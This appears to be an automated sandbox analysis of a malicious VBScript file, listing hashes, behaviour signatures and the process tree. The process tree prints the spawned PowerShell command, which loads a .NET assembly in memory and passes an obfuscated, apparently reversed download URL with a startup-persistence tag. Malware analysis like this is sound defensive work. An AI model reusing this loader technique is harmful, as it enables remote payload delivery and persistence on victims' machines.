Analysis
-
max time kernel
28s -
max time network
32s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
-
submitted
25-05-2023 15:22
General
-
Target
TT-Copy.vbs
-
Size
412KB
-
MD5
58d0c5536fd1dce3102c4aab5c36fb6f
-
SHA1
a1109dbce63346db7cbbd0c03fca71cd0672c086
-
SHA256
95ac96a9d770db33fe2647d5bd183a282584df47d521afd23ce5a8bec8efcb95
-
SHA512
b9c55a1945fe389498482f345c13012e701230a78aff3e83f9e79e613884ecc2d8ffc06b3e7c51ba6d4ab61dbc9029b6d3a9646aeecade80975caac470966ff7
-
SSDEEP
3072:J+GEwfkYFEhNe4VTdRnTT8w4TWD5ZqsOgDHpb+og0S7wQzS18f8d6bb/g52r:SwfkYFiZqf
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TT-Copy.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('f0∞*▲◀(](∞ú(8!}(ú░}8*(+ø(98∞*▲◀(](∞ú(-4}�ø▶64}�ø▶a-(úø(@@*ú4}�ø▶4}�ø▶4-](∞ú(844-5394*(+ø(](∞ú(!}(ú░}0=n∞*▲◀(koø☀☞√�}П�&ai4}�ø▶∞*▲◀(m=ø☀☞√�}П�la?ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.!}(ú░}v4*●*☞#:▶o4*●*☞#:▶mo!}(ú░}.ø☀☞√�}П�opsppa.566rgz∞*▲◀(sg↓*(▲☟@*⇝g4*●*☞#:▶*(+ø(4*●*☞#:▶0v4*●*☞#:▶mo!}(ú░}.sipa∞*▲◀(lgoog.∞*▲◀(garoø☀☞√�}П�s∞*▲◀(sa*(+ø(∞*▲◀(rif4*●*☞#:▶4*●*☞#:▶▶☟ð}↓→+◀spø☀☞√�}П�ø☀☞√�}П�↓*(▲☟@*⇝','1No1me_Startup','2'))2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB